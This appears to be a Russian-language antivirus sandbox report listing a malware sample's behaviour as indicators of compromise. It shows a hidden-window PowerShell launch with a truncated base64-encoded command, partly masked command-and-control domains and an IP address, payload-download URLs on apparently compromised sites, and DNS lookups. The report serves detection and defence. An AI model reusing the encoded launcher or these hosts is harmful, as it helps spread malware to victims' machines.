Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMADQAdgA9ACAAWwB0AHkAcABlAF0AKAAiAHsAMAB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAFkAcwBUACcALAAnAFkAJwAsACcAUgAnACwAJwBFAE0ALgAnACwAJwBPAC4ARABpAHIARQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1444
- %TEMP%\532868.cvr
- '34.##9.100.209':443
- 'lu##ox.com':443
- 'su####menthouse.net':80
- 'ge####alhas.com.br':80
- 'ge####alhas.com.br':443
- 'da###yse.net':80
- 'gr####ync.com.br':80
- 'gi###menti.wine':443
- http://su####menthouse.net/tws-airpods/MTB/
- http://ge####alhas.com.br/PHPMailer/VjGT9xw6sS/
- http://da###yse.net/cgi-bin/GmZVCzJl/
- http://gr####ync.com.br/aspnet_clientOld/v/
- 'ge####alhas.com.br':443
- 'gi###menti.wine':443
- DNS ASK lu##ox.com
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK su####menthouse.net
- DNS ASK ge####alhas.com.br
- DNS ASK br#####acambas.com.br
- DNS ASK da###yse.net
- DNS ASK gr####ync.com.br
- DNS ASK gi###menti.wine
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMADQAdgA9ACAAWwB0AHkAcABlAF0AKAAiAHsAMAB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAFkAcwBUACcALAAnAFkAJwAsACcAUgAnACwAJwBFAE0ALgAnACwAJwBPAC4ARABpAHIARQ... (со скрытым окном)